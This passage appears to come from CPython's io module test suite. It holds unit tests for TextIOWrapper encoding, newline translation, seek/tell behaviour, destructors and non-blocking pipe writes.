modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_encoding(self):
# Check that the encoding attribute is always set and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf8")
self.assertEqual(t.encoding, "utf8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin1", "utf8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make the test faster by doing smaller seeks.
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check that the BOM is written only once (see issue #1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# Read in amounts equal to TextIOWrapper._CHUNK_SIZE, which is 128.
def test_read_by_chunk(self):
# Make sure "\r\n" straddles the 128-character boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue #6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
def bad_flush():
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
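# The mock below hands back one chunk per raw read() call, so the checks that
# follow effectively confirm the wrapper stitches together several short raw
# reads (e.g. read(4) spanning b'abc' and b'def') without a buffer in between.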
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
pass
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except EnvironmentError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings.catch_warnings(record=True) as recorded:
open(r, *args, closefd=False, **kwargs)
support.gc_collect()
self.assertEqual(recorded, [])
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
